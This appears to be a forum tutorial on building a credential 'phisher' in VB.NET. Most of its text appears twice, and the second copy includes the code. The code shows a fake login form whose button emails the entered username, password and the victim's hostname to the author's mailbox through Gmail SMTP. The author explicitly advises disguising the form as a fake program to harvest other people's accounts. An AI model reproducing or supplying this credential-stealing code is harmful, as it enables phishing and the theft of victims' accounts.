Hey and welcome to my guide on how to make a phisher in vb.NET ! Let's get started !
1. Requirements
2. Starting
Open Visual Studio and start a new project, name it something like 'Phisher'.
Add 2 labels, 2 textboxes and 1 button. And name them like this:
Now select textbox 2 (which is the textbox for the password) and go to PasswordCharacter and make it '•' or '*'.
Okay now we're done with the form desing, lets head to the coding !
3. Coding
Double click your button 'Log in' and you will go to the codes of your program.
At the top import:
So it will look like this:
Now in the buttonclick event paste this:
The code will send an email with the Username & Password entered in the textboxes.
Replace [email protected] with your email, and Your password with your password.
If you aren't using a gmail replace ("smtp.gmail.com"). If you use a @hotmail.com or a @live.com mail the smtp server is smtp.live.com.
4. End
Debug your program and it should work ! If you want to get accounts like this you will have to change the GUI to a fake program, where people will enter their username/password. Thought this is very basic and doesn't use encryption, so it will be pretty easy for people to crack it and grab your email/pass.
Click here for my Encryption Tutorial ! Highly Recommended !
Please post feedback
Took me some time to write this 
1. Requirements
- Visual Studio (Version doesnt matter)
- Basic programming knowledge would be good but not needed.
- Email account
2. Starting
Open Visual Studio and start a new project, name it something like 'Phisher'.
Add 2 labels, 2 textboxes and 1 button. And name them like this:
Now select textbox 2 (which is the textbox for the password) and go to PasswordCharacter and make it '•' or '*'.
Okay now we're done with the form desing, lets head to the coding !
3. Coding
Double click your button 'Log in' and you will go to the codes of your program.
At the top import:
Code:
Imports System.Net.Mail
So it will look like this:
Now in the buttonclick event paste this:
Code:
Try
Dim Mail As New MailMessage
Mail.Subject = ("Log from: " & System.Net.Dns.GetHostName)
Mail.To.Add("[email protected]")
Mail.From = New MailAddress("[email protected]")
Mail.Body = "-Log from: " & System.Net.Dns.GetHostName & " -" & Environment.NewLine & "Username: " & TextBox1.Text & Environment.NewLine & "Password: " & TextBox2.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("[email protected]", "Your password")
SMTP.Port = 587
SMTP.Send(Mail)
Catch exception As Exception
'
End Try
Replace [email protected] with your email, and Your password with your password.
If you aren't using a gmail replace ("smtp.gmail.com"). If you use a @hotmail.com or a @live.com mail the smtp server is smtp.live.com.
4. End
Debug your program and it should work ! If you want to get accounts like this you will have to change the GUI to a fake program, where people will enter their username/password. Thought this is very basic and doesn't use encryption, so it will be pretty easy for people to crack it and grab your email/pass.
Click here for my Encryption Tutorial ! Highly Recommended !
Please post feedback